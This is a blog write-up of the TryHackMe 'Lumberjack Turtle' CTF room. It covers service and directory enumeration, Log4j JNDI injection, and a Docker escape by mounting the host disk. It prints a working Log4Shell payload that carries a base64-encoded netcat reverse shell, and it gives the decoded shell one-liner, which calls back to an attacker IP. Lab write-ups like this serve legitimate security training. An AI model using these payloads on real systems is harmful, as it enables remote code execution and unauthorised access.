TryHackMe: Lumberjack Turtle

tryhackme Lumberjack Turtle write-up

  • Name: Lumberjack Turtle
  • Description: No logs, no crime… so says the lumberjack.
  • Room: tryhackme.com
  • Difficulty: Medium

Services enumeration

Let’s use Nmap to enumerate the services. We discover two ports:

command : nmap -sC -sV <Machine-IP>

Web enumeration

We scan directories with gobuster

command: gobuster dir -u http://10.10.18.151 -w /usr/share/wordlists/dirb/common.txt

There are no properties in these two paths

log4j detection

Check the log4j vulnerabilities

payload: ${jndi:ldap://<IP>:<PORT>}

and

There seems to be this vulnerability

Log4j

JNDI Injection Exploit

send payload

payload : ${jndi:ldap://10.4.44.217:1389/Basic/Command/Base64/cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDEwLjQuNDQuMjE3IDQzMjEgPi90bXAvZg==}

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.4.44.217 4321 >/tmp/f

After sending the request…

The first flag

user flag

root flag

Docker escape

mount xvda1 in /tmp/esc

command : mount xvda1 /tmp/esc

mount xvda1
fake flag

This is not the original flag and we have to look for the real flag

real flag

thank you 🌏🔥

--

--

--

Computer student and interested in programming and security

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Backup and Replication Explained: What’s the Difference?

Announcement: MYKEY Officially Joined the MPC Alliance

Credit Card Fraud — How Businesses & Consumers can Avoid it in 2019?

UPDATE | Parami Bi-Weekly (July 12–July 25)

Library — TryHackMe Writeup

‘It’s been hell’: How fraudsters use handsome soldiers to prey on lonely hearts over the holidays

HURRAAAAAY

{UPDATE} Español Words Finder PRO Hack Free Resources Generator

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Hassan Mohammadi

Hassan Mohammadi

Computer student and interested in programming and security

More from Medium

Vulnhub Series →DC-1

TryHackMe Writeup-GameZone

TryHackMe: Mr. Robot CTF Writeup

TryHackMe Writeup —  VulnNet Internal